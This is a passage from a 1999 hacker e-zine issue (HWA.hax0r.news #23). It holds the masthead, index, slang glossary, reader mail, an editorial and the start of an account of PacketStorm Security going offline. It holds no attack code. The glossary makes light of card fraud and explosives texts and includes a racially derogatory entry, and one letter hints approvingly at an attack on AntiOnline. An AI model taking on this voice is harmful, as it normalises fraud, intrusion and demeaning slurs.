[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
=                       <=-[ HWA.hax0r.news ]-=>                         =
==========================================================================
[=HWA'99=] Number 23 Volume 1 1999 July 4th 99
==========================================================================
[ 61:20:6B:69:64:20:63:6F:75: ]
[ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ]
[ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ]
==========================================================================

"I have received more death threats in the last 24 hours by phone, than I have in five years," - John Vranesevich aka JP (AntiOnline)

HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net and www.digitalgeeks.com thanks to p0lix for the digitalgeeks bandwidth and airportman for the Cubesoft bandwidth. Also shouts out to all our mirror sites! tnx guys.

http://www.csoft.net/~hwa
http://www.digitalgeeks.com/hwa

HWA.hax0r.news Mirror Sites:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa.
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://packetstorm.harvard.edu/hwahaxornews/ * DOWN *
http://archives.projectgamma.com/zines/hwa/.
http://www.403-security.org/Htmls/hwa.hax0r.news.htm

SYNOPSIS (READ THIS)
--------------------

The purpose of this newsletter is to 'digest' current events of interest that affect the online underground and netizens in general. This includes coverage of general security issues, hacks, exploits, underground news and anything else I think is worthy of a look see. (remember i'm doing this for me, not you, the fact some people happen to get a kick/use out of it is of secondary importance).
This list is NOT meant as a replacement for, nor to compete with, the likes of publications such as CuD or PHRACK or with news sites such as AntiOnline, the Hacker News Network (HNN) or mailing lists such as BUGTRAQ or ISN nor could any other 'digest' of this type do so. It *is* intended however, to complement such material and provide a reference to those who follow the culture by keeping tabs on as many sources as possible and providing links to further info, its a labour of love and will be continued for as long as I feel like it, i'm not motivated by dollars or the illusion of fame, did you ever notice how the most famous/infamous hackers are the ones that get caught? there's a lot to be said for remaining just outside the circle...

@HWA

=-----------------------------------------------------------------------=
Welcome to HWA.hax0r.news ... #23
=-----------------------------------------------------------------------=

We could use some more people joining the channel, its usually pretty quiet, we don't bite (usually) so if you're hanging out on irc stop by and idle a while and say hi...

*******************************************************************
***  /join #HWA.hax0r.news on EFnet the key is `zwen'           ***
***                                                             ***
***  please join to discuss or impart news on techno/phac scene ***
***  stuff or just to hang out ... someone is usually around 24/7***
***                                                             ***
***  Note that the channel isn't there to entertain you its for ***
***  you to talk to us and impart news, if you're looking for fun***
***  then do NOT join our channel try #weirdwigs or something... ***
***                                                             ***
***  we're not #chatzone or #hack                               ***
***                                                             ***
*******************************************************************

=-------------------------------------------------------------------------=
Issue #23
=--------------------------------------------------------------------------=
[ INDEX ]
=--------------------------------------------------------------------------=
Key     Intros
=--------------------------------------------------------------------------=
00.0 .. COPYRIGHTS ......................................................
00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
00.2 .. SOURCES .........................................................
00.3 .. THIS IS WHO WE ARE ..............................................
00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?..........................
00.5 .. THE HWA_FAQ V1.0 ................................................
=--------------------------------------------------------------------------=
Key     Content
=--------------------------------------------------------------------------=
01.0 .. GREETS ..........................................................
01.1 .. Last minute stuff, rumours, newsbytes ...........................
01.2 .. Mailbag .........................................................
02.0 .. From the Editor..................................................
AA.A .. SPECIAL: AntiOnline's JP pulls the plug on PacketStorm Security
03.0 .. Cable Modem Hijacking from www.hackcanada.com....................
04.0 .. Exploiting Null Session Weaknesses in NT environment.............
05.0 .. Cognos PowerPlay Web Edition security vulnerability allows access to data cubes..
06.0 .. VMware Security Alert............................................
07.0 .. Security vulnerability in hustler.com login template ............
08.0 .. DOD investigating computer 'Mob-like' tactics....................
09.0 .. GSA announces Intrusion Detection Net............................
10.0 .. Nasa servers reportedly hacked...................................
11.0 .. UK May Force ISPs to Install Taps................................
12.0 .. Crypto Tie Downs Loosened .......................................
13.0 .. Heathen.A Spreads Through Word Files ............................
14.0 .. $950 for a Log File Analysis Tool ...............................
15.0 .. Youth Charged With $20,000 in Damages ...........................
16.0 .. Army Fights Online Battle And Loses .............................
17.0 .. Welfare Reform Law Invades Privacy of US Citizens ...............
18.0 .. GSM Mobile Security is Cracked ..................................
19.0 .. Microsoft Mono-culture Poses National Security Risk .............
20.0 .. BugTraq Moves To SecurityFocus ..................................
21.0 .. MS Gives Out Pirate Dough .......................................
22.0 .. Biometrics comes to Home Shopping ...............................
23.0 .. Palm VII Revealed ...............................................
24.0 .. Who Is HNN? .....................................................
25.0 .. AntiOnline on the trail of f0rpaxe...............................
26.0 .. Critical NOAA Web Site Attacked .................................
27.0 .. Back Orifice 2000 is on its Way .................................
28.0 .. Support for Web Security Spec Announced .........................
29.0 .. Pentagon Investigates Computer Security Breach ..................
30.0 .. What will the Next Generation of Viruses Bring? .................
31.0 .. DIRT still Around, Used by Law Enforcement ......................
32.0 .. Debit Cards Not Safe on the Internet ............................
33.0 .. New Definition of 'Computer Hacker' .............................
34.0 .. Hackers In the Workplace ........................................
35.0 .. NPR Covers .gov/.mil Defacements. ...............................
36.0 .. Australia Passes Major Net Censorship Law .......................
37.0 .. Hacker crackdown, is your nick on this list?? ...................
=--------------------------------------------------------------------------=
RUMOURS  .. Rumours from around and about, mainly HNN stuff (not hacked websites)
AD.S     .. Post your site ads or etc here, if you can offer something in return thats tres cool, if not we'll consider ur ad anyways so send it in. ads for other zines are ok too btw just mention us in yours, please remember to include links and an email contact. Corporate ads will be considered also and if your company wishes to donate to or participate in the upcoming Canc0n99 event send in your suggestions and ads now... n.b date and time may be pushed back join mailing list for up to date information. Current dates: Aug19th-22nd Niagara Falls...
HA.HA    .. Humour and puzzles ............................................
            Hey You!
            =------=
            Send in humour for this section! I need a laugh and its hard to find good stuff... ;)
SITE.1   .. Featured site, ...............................................
H.W      .. Hacked Websites ..............................................
A.0      .. APPENDICES...................................................
A.1      .. PHACVW linx and references...................................
=--------------------------------------------------------------------------=

@HWA'99

00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).
Important semi-legalese and license to redistribute:

YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. LINKS ARE NOT NECESSARY OR EXPECTED BUT ARE APPRECIATED the current link is http://welcome.to/HWA.hax0r.news

IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL ME PRIVATELY current email cruciphux@dok.org

THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:

I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND REDISTRIBUTE/MIRROR.

- EoD

Although this file and all future issues are now copyright, some of the content holds its own copyright and these are printed and respected. News is news so i'll print any and all news but will quote sources when the source is known, if its good enough for CNN its good enough for me. And i'm doing it for free on my own time so pfffft. :)

No monies are made or sought through the distribution of this material. If you have a problem or concern email me and we'll discuss it.

cruciphux@dok.org

Cruciphux [C*:.]

00.1 CONTACT INFORMATION AND MAIL DROP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Wahoo, we now have a mail-drop, if you are outside of the U.S.A or Canada / North America (hell even if you are inside ..) and wish to send printed matter like newspaper clippings a subscription to your cool foreign hacking zine or photos, small non-explosive packages or sensitive information etc etc well, now you can. (w00t) please no more inflatable sheep or plastic dog droppings, or fake vomit thanks.

Send all goodies to:

HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA
L6V 4H5

WANTED!: POSTCARDS! YESH!
POSTCARDS, I COLLECT EM so I know a lot of you are reading this from some interesting places, make my day and get a mention in the zine, send in a postcard, I realize that some places it is cost prohibitive but if you have the time and money be a cool dude / gal and send a poor guy a postcard preferably one that has some scenery from your place of residence for my collection, I collect stamps too so you kill two birds with one stone by being cool and mailing in a postcard, return address not necessary, just a "hey guys being cool in Bahrain, take it easy" will do ... ;-) thanx.

Ideas for interesting 'stuff' to send in apart from news:

- Photo copies of old system manual front pages (optionally signed by you) ;-)
- Photos of yourself, your mom, sister, dog and or cat in a NON compromising position plz I don't want pr0n.
- Picture postcards
- CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250 tapes with hack/security related archives, logs, irc logs etc on em.
- audio or video cassettes of yourself/others etc of interesting phone fun or social engineering examples or transcripts thereof.

If you still can't think of anything you're probably not that interesting a person after all so don't worry about it

Our current email:

Submissions/zine gossip.....: hwa@press.usmc.net
Private email to editor.....: cruciphux@dok.org
Distribution/Website........: sas72@usa.net

@HWA

00.2 Sources ***
~~~~~~~~~~~

Sources can be some, all, or none of the following (by no means complete nor listed in any degree of importance) Unless otherwise noted, like msgs from lists or news from other sites, articles and information is compiled and or sourced by Cruciphux no copyright claimed.

News & I/O zine ..................http://www.antionline.com/
Back Orifice/cDc..................http://www.cultdeadcow.com/
News site (HNN) ..................http://www.hackernews.com/
Help Net Security.................http://net-security.org/
News,Advisories,++ ...............http://www.l0pht.com/
NewsTrolls .......................http://www.newstrolls.com/
News + Exploit archive ...........http://www.rootshell.com/beta/news.html
CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest
News site+........................http://www.zdnet.com/
News site+Security................http://www.gammaforce.org/
News site+Security................http://www.projectgamma.com/
News site+Security................http://securityhole.8m.com/
News site+Security related site...http://www.403-security.org/
News/Humour site+ ................http://www.slashdot.org

+Various mailing lists and some newsgroups, such as ...
+other sites available on the HNN affiliates page, please see http://www.hackernews.com/affiliates.html as they seem to be popping up rather frequently ...

http://www.the-project.org/ .. IRC list/admin archives
http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk

alt.hackers.malicious
alt.hackers
alt.2600
BUGTRAQ
ISN security mailing list
ntbugtraq
<+others>

NEWS Agencies, News search engines etc:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.cnn.com/SEARCH/
http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0
http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack
http://www.ottawacitizen.com/business/
http://search.yahoo.com.sg/search/news_sg?p=hack
http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack
http://www.zdnet.com/zdtv/cybercrime/
http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)

NOTE: See appendices for details on other links.
http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
http://freespeech.org/eua/ Electronic Underground Affiliation
http://ech0.cjb.net ech0 Security
http://axon.jccc.net/hir/ Hackers Information Report
http://net-security.org Net Security
http://www.403-security.org Daily news and security related site

Submissions/Hints/Tips/Etc
~~~~~~~~~~~~~~~~~~~~~~~~~~

All submissions that are `published' are printed with the credits you provide, if no response is received by a week or two it is assumed that you don't care whether the article/email is to be used in an issue or not and may be used at my discretion.

Looking for: Good news sites that are not already listed here OR on the HNN affiliates page at http://www.hackernews.com/affiliates.html

Magazines (complete or just the articles) of breaking sekurity or hacker activity in your region, this includes telephone phraud and any other technological use, abuse hole or cool thingy. ;-) cut em out and send it to the drop box.

- Ed

Mailing List Subscription Info (Far from complete) Feb 1999
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~

ISS Security mailing list faq : http://www.iss.net/iss/maillist.html

THE MOST READ:

BUGTRAQ - Subscription info
~~~~~~~~~~~~~~~~~~~~~~~~~~~

What is Bugtraq?

Bugtraq is a full-disclosure UNIX security mailing list, (see the info file) started by Scott Chasin. To subscribe to bugtraq, send mail to listserv@netspace.org containing the message body subscribe bugtraq. I've been archiving this list on the web since late 1993. It is searchable with glimpse and archived on-the-fly with hypermail.

Searchable Hypermail Index; http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html

About the Bugtraq mailing list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The following comes from Bugtraq's info file:

This list is for *detailed* discussion of UNIX security holes: what they are, how to exploit, and what to do to fix them.
This list is not intended to be about cracking systems or exploiting their vulnerabilities. It is about defining, recognizing, and preventing use of security holes and risks.

Please refrain from posting one-line messages or messages that do not contain any substance that can relate to this list's charter.

I will allow certain informational posts regarding updates to security tools, documents, etc. But I will not tolerate any unnecessary or nonessential "noise" on this list.

Please follow the below guidelines on what kind of information should be posted to the Bugtraq list:

+ Information on Unix related security holes/backdoors (past and present)
+ Exploit programs, scripts or detailed processes about the above
+ Patches, workarounds, fixes
+ Announcements, advisories or warnings
+ Ideas, future plans or current works dealing with Unix security
+ Information material regarding vendor contacts and procedures
+ Individual experiences in dealing with above vendors or security organizations
+ Incident advisories or informational reporting

Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq reflector address if the response does not meet the above criteria.

Remember: YOYOW. You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of those words without your permission in any medium outside the distribution of this list may be challenged by you, the author.

For questions or comments, please mail me: chasin@crimelab.com (Scott Chasin)

Crypto-Gram
~~~~~~~~~~~

CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses, insights, and commentaries on cryptography and computer security. To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe, visit http://www.counterpane.com/unsubform.html.
Back issues are available on http://www.counterpane.com.

CRYPTO-GRAM is written by Bruce Schneier. Schneier is president of Counterpane Systems, the author of "Applied Cryptography," and an inventor of the Blowfish, Twofish, and Yarrow algorithms. He served on the board of the International Association for Cryptologic Research, EPIC, and VTW. He is a frequent writer and lecturer on cryptography.

CUD Computer Underground Digest
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

This info directly from their latest ish:

Computer underground Digest    Sun  14 Feb, 1999   Volume 11 : Issue 09
                               ISSN  1004-042X

       Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
       News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
       Archivist: Brendan Kehoe
       Poof Reader:   Etaion Shrdlu, Jr.
       Shadow-Archivists: Dan Carosone / Paul Southworth
                          Ralph Sims / Jyrki Kuoppala
                          Ian Dickinson
       Cu Digest Homepage: http://www.soci.niu.edu/~cudigest

[ISN] Security list
~~~~~~~~~~~~~~~~~~~

This is a low volume list with lots of informative articles, if I had my way i'd reproduce them ALL here, well almost all .... ;-) - Ed

Subscribe: mail majordomo@repsec.com with "subscribe isn".

@HWA

00.3 THIS IS WHO WE ARE
~~~~~~~~~~~~~~~~~~

Some HWA members and Legacy staff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

cruciphux@dok.org.........: currently active/editorial
darkshadez@ThePentagon.com: currently active/man in black
fprophet@dok.org..........: currently active/IRC+ man in black
sas72@usa.net ............: currently active/IRC+ distribution
vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
dicentra...(email withheld): IRC+ grrl in black

Foreign Correspondents/affiliate members
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

N0Portz ..........................: Australia
Qubik ............................: United Kingdom
system error .....................: Indonesia
Wile (wile coyote) ...............: Japan/the East
Ruffneck .........................: Netherlands/Holland

And unofficially yet contributing too much to ignore ;)

Spikeman .........................: World media

Please send in your sites for inclusion here if you haven't already also if you want your emails listed send me a note ... - Ed

Spikeman's site is down as of this writing, if it comes back online it will be posted here.

http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian)

*******************************************************************
***  /join #HWA.hax0r.news on EFnet the key is `zwen'           ***
*******************************************************************

:-p

1. We do NOT work for the government in any shape or form. Unless you count paying taxes ... in which case we work for the gov't in a BIG WAY. :-/

2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news events its a good idea to check out issue #1 at least and possibly also the Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ...

@HWA

00.4 Whats in a name? why HWA.hax0r.news??
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Well what does HWA stand for? never mind if you ever find out I may have to get those hax0rs from 'Hackers' or the Pretorians after you.

In case you couldn't figure it out hax0r is "new skewl" and although it is laughed at, shunned, or even pigeon holed with those 'dumb leet (l33t?) dewds' this is the state of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you up and comers, i'd highly recommend you get that book.
Its almost like buying a clue. Anyway..on with the show .. - Editorial staff

@HWA

00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Also released in issue #3. (revised) check that issue for the faq it won't be reprinted unless changed in a big way with the exception of the following excerpt from the FAQ, included to assist first time readers:

Some of the stuff related to personal usage and use in this zine are listed below: Some are very useful, others attempt to deny any possible attempts at eschewing obfuscation by obscuring their actual definitions.

@HWA     - see EoA ;-)

!=       - Mathematical notation "is not equal to" or "does not equal" ASC(247) "wavey equals" sign means "almost equal" to. If written an =/= (equals sign with a slash thru it) also means !=, =< is Equal to or less than and => is equal to or greater than (etc, this aint fucking grade school, cripes, don't believe I just typed all that..)

AAM      - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)

AOL      - A great deal of people that got ripped off for net access by a huge clueless isp with sekurity that you can drive buses through, we're not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the least they could try leasing one??

*CC      - 1 - Credit Card (as in phraud)
           2 - .cc is COCOS (Keeling) ISLANDS but they probably accept cc's

CCC      - Chaos Computer Club (Germany)

*CON     - Conference, a place hackers crackers and hax0rs among others go to swap ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk watch videos and seminars, get drunk, listen to speakers, and last but not least, get drunk.

*CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker speak he's the guy that breaks into systems and is often (but by no means always) a "script kiddie" see pheer
           2 . An edible biscuit usually crappy tasting without a nice dip, I like jalapeno pepper dip or chives sour cream and onion, yum - Ed

Ebonics  - speaking like a rastafarian or hip dude of colour also wigger Vanilla Ice is a wigger, The Beastie Boys and rappers speak using ebonics, speaking in a dark tongue ... being ereet, see pheer

EoC      - End of Commentary
EoA      - End of Article or more commonly @HWA
EoF      - End of file
EoD      - End of diatribe (AOL'ers: look it up)

FUD      - Coined by Unknown and made famous by HNN - "Fear uncertainty and doubt", usually in general media articles not high brow articles such as ours or other HNN affiliates ;)

du0d     - a small furry animal that scurries over keyboards causing people to type weird crap on irc, hence when someone says something stupid or off topic 'du0d wtf are you talkin about' may be used.

*HACKER  - Read Stephen Levy's HACKERS for the true definition, then see HAX0R

*HAX0R   - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to define, I think it is best defined as pop culture's view on The Hacker ala movies such as well erhm "Hackers" and The Net etc... usually used by "real" hackers or crackers in a derogatory or slang humorous way, like 'hax0r me some coffee?' or 'can you hax0r some bread on the way to the table please?'
           2 - A tool for cutting sheet metal.

HHN      - Maybe a bit confusing with HNN but we did spring to life around the same time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper noun means the hackernews site proper. k? k.

HNN      - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html

J00      - "you" (as in j00 are OWN3D du0d) - see 0wn3d

MFI/MOI  - Missing on/from IRC

NFC      - Depends on context: No Further Comment or No Fucking Comment

NFR      - Network Flight Recorder (Do a websearch) see 0wn3d

NFW      - No fuckin'way

*0WN3D   - You are cracked and owned by an elite entity see pheer

*OFCS    - Oh for christ's sakes

PHACV    - And variations of same Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare
           Alternates:
           H - hacking, hacktivist
           C - Cracking
           V - Virus
           W - Warfare
           A - Anarchy (explosives etc, Jolly Roger's Cookbook etc)
           P - Phreaking, "telephone hacking" PHone fREAKs ...
           CT - Cyber Terrorism

*PHEER   - This is what you do when an ereet or elite person is in your presence see 0wn3d

*RTFM    - Read the fucking manual - not always applicable since some manuals are pure shit but if the answer you seek is indeed in the manual then you should have RTFM you dumb ass.

TBC      - To Be Continued also 2bc (usually followed by ellipses...) :^0
TBA      - To Be Arranged/To Be Announced also 2ba
TFS      - Tough fucking shit.

*w00t    - 1 - Reserved for the uber ereet, noone can say this without severe repercussions from the underground masses. also "w00ten"
           2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers)

*wtf     - what the fuck

*ZEN     - The state you reach when you *think* you know everything (but really don't) usually shortly after reaching the ZEN like state something will break that you just 'fixed' or tweaked.

@HWA

-=- :. .: -=-

01.0 Greets!?!?! yeah greets! w0w huh. - Ed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Thanks to all in the community for their support and interest but i'd like to see more reader input, help me out here, whats good, what sucks etc, not that I guarantee i'll take any notice mind you, but send in your thoughts anyway.
* all the people who sent in cool emails and support

FProphet  Pyra  TwstdPair  _NeM_  D----Y  Kevin Mitnick (watch yer back)  Dicentra  vexxation  sAs72  Spikeman  Astral  p0lix  Vexx  g0at security  pr0xy  Astral

Ken Williams/tattooman of PacketStorm, hang in there Ken...:(

and the #innerpulse, crew (innerpulse is back!) and some inhabitants of #leetchans .... although I use the term 'leet loosely these days, ;)

kewl sites:

+ http://www.securityfocus.com NEW
+ http://www.hackcanada.com
+ http://www.l0pht.com/
+ http://www.2600.com/
+ http://www.freekevin.com/
+ http://www.genocide2600.com/
+ http://www.packetstorm.harvard.edu/ ******* DOWN ********* SEE AA.A
+ http://www.hackernews.com/ (Went online same time we started issue 1!)
+ http://www.net-security.org/
+ http://www.slashdot.org/
+ http://www.freshmeat.net/
+ http://www.403-security.org/
+ http://ech0.cjb.net/

@HWA

01.1 Last minute stuff, rumours and newsbytes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

"What is popular isn't always right, and what is right isn't always popular..." - FProphet '99

+++ When was the last time you backed up your important data?

++ Help Net Security is Moving.
   contributed by BHZ

Help-net Security, an HNN Affiliate is moving to a new server. Unfortunately they have encountered a few problems with transferring the domain. So net-security.org could be unfunctional for up to 5 days. In the mean time you can reach HNS at http://hns.crolink.net

Help-net Security - Old URL http://net-security.org
Help-net Security - New URL http://hns.crolink.net

++ TECHNO BRA CALLS THE COPS (TECH. 3:00 am Jul 1st)
http://www.wired.com/news/news/email/explode-infobeat/technology/story/20517.html
A security bra monitors the wearer's heart rate to sense danger. When activated, it relays her location to the cops and helps them make a bust. By Leander Kahney.

++ ALLEN BUYS ANOTHER CABLE SHOP (BUS. 9:00 am Jul 1st)
http://www.wired.com/news/news/email/explode-infobeat/business/story/20528.html
Paul Allen takes another step towards becoming master of his own "wired world" with the US$3.1 billion acquisition of Bresnan Communications, a Midwest cable operator.

++ WAITING FOR WAP (TECH. 3:00 am Jul 1st)
http://www.wired.com/news/news/email/explode-infobeat/technology/story/20521.html
Supporters say the Wireless Access Protocol promises to bring Web services to tiny cell-phone screens. But when? Chris Oakes reports from San Francisco.

++ APACHE NOW IN GOOD COMPANY (TECH. Wednesday)
http://www.wired.com/news/news/email/explode-infobeat/technology/story/20506.html
The free Web server that has always had the lion's share of the market now has a corporation behind it. The nonprofit company is being run by Apache's founding fathers.

++ SORRY, WRONG NUMBER (WRLD Wednesday)
http://www.wired.com/news/news/email/explode-infobeat/story/20509.html
Manhattanites take pride in their 212 area code, a distinctive symbol of living in The Most Important Place on Earth. But starting Thursday, some of them are going to have to adjust to life without 212, when Bell Atlantic begins issuing 646 area codes to new phone subscribers in Manhattan. The move, necessitated by too many phone numbers, is not going down too well, although former New York Mayor Ed Koch expects the grousing to stop after an adjustment period. Besides, residents of Gotham will still hold on to all the other perks that make living there such a joy: astronomical rents, overpriced restaurants, and living cheek-by-jowl with one another.

++ ZEROING IN ON CELL-PHONE 911S (TECH. Wednesday)
http://www.wired.com/news/news/email/explode-infobeat/technology/story/20504.html
New technology will pinpoint a mobile-phone user's location to within 5 feet -- a potential lifesaver in 911 calls. But watchdogs say the data will inevitably be within the reach of snoops. By Chris Oakes.
Mucho thanks to Spikeman for directing his efforts to our cause of bringing you the news we want to read about in a timely manner ... - Ed

@HWA

01.2 MAILBAG - email and posts from the message board worthy of a read
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

-=-

From: "Whimsies & Company"
To:
Subject: Please support Justice and Free Speech
Date: Thu, 1 Jul 1999 19:18:02 -0400
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 4.72.3110.5
X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3110.3

Dark Modem DOWN For Emergency ACTION

OK, two issues:

1) the following message has been sent to a TARGETED audience. We have walked a thin line between targeted mailing and spam. If we get even one complaint, we will stop.

2) It cannot be confirmed that any unusual activity has occurred on the antionline network in the past 24 hours *grin* therefore we have taken that statement out of the message.

Again, we do NOT advocate spamming, we only want people who might be interested in this issue to be aware, so use DISCRETION when sending any mail.

This is an emergency email message from Dark Modem (http://www.darkmodem.org).

Yesterday (June 30, 1999), Packet Storm Security was taken offline after John Vranesevich sent an email to Harvard University about the JP section that was on the site. Some suspect it was really jealousy and animosity toward Ken Williams that drove JP to commit this offensive act. Packet Storm was in direct competition with antionline and essentially blew antionline out of the water in every category. It is this author's belief, therefore, that JP was trying to protect his "marketshare" (something that Ken Williams would never have done, since he was not in it for money).
Please show your support by mentioning this topic on your website,
forwarding this email to "whom it may concern", and sending email in
support of Ken and PSS to Harvard and antionline.

================================================================

@HWA

02.0 From the editor.
~~~~~~~~~~~~~~~~~~~~~

#include <stdio.h>

main()
{
    printf ("Read commented source!\n\n");
    /*
     * Otay buttwheat, here's #23 it might not be as bulging in the
     * pantal area as #22 but it should be a little cleaner (or not)
     * we've had some people coming into the IRC channel on EFNET and
     * just parting, maybe you're just scanning the nicks, but hey we
     * don't bite come and hang out, maybe chat about some of the shit
     * that's going down with Packetstorm or why 2600 is $7.15 in Canada
     * does Eric hate Canadians or what's the story?
     *
     * ... who the fuck does JP think he is? fucking with PSS
     * there goes a ton of Ken's work down the drain...fuck AntiOnline!
     * (Read section AA.A)
     *
     * anyway enjoy this issue and shouts out to HackCanada..and Ken
     * Williams ..
     *
     */
    printf ("EoF.\n");
}

Issue #23, rocking your sysadmin and hax0r asses in 99...

Congrats, thanks, articles, news submissions and kudos to us at the main
address: hwa@press.usmc.net complaints and all nastygrams and mailbombs
can go to /dev/null nukes, synfloods and papasmurfs to 127.0.0.1,
private mail to cruciphux@dok.org

danke.

C*:.

@HWA

AA.A AntiOnline's JP causes the plug to be pulled on PacketStorm by Harvard
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

On the morning of June 30th a call from John Vranesevich (aka JP) of
AntiOnline to Harvard started off an avalanche of events that culminated
in the plug being pulled at packetstorm.harvard.edu. Along with personal
data it was initially reported that the entire site was lost; this may
now not be the case. Included here are statements from JP, Harvard, Ken
Williams and stories from Attrition.org, HNN (http://www.hackernews.com)
and other sources....
read the sordid story below - Ed

(At this time it is uncertain whether Ken does or does not have backups
of his PacketStorm site available to him, but some people on the net have
taken it upon themselves to begin a new mirror and are calling for people
that have downloaded from the site to re-upload the files to the
following url; http://packetstorm.nl.linux.org/ - Ed )

From: Ken Williams
X-Sender: jkwilli2@ultra3-100lez.eos.ncsu.edu
To: The Usual Suspects: ;
Date: Thu, 1 Jul 1999 02:17:40 -0400 (EDT)

-----BEGIN PGP SIGNED MESSAGE-----

Hi,

I just got off the phone (6/30/99 PM) with one of the Harvard Network
managers. John Vranesevich, of www.AntiOnline.com, contacted Harvard this
morning and threatened to sue them because of the content in the jp/
directory of the Packet Storm Security web site that was located at
http://packetstorm.harvard.edu, and before that at
http://packetstorm.genocide2600.com (see www.attrition.org for details
about this info). I was told that the situation quickly escalated to the
Harvard Office of General Counsel.

John Vranesevich claims that I was using the server as a platform to
harass and threaten him, his family, and his business. Nothing could be
further from the truth. I ran a network security related web site and
archive!

The result: the server and the web site and its contents are permanently
offline, I have no access to even retrieve anything off of the server,
the site known as "Packet Storm Security" is history now. I was told by
Leo Donnelly at Harvard, via phone, that ALL of the content AND the
backups made are either destroyed, being destroyed now, or will be before
I can do anything to prevent it. All 4+ GB of files in the publicly
accessible directories, over 45,000 files collected and archived over the
years, are gone. There was another 4 GB that was composed of research
data, customized IDS, Linux, Apache software, etc too.
Harvard is facing a lawsuit from JP, I am facing a lawsuit from JP, and
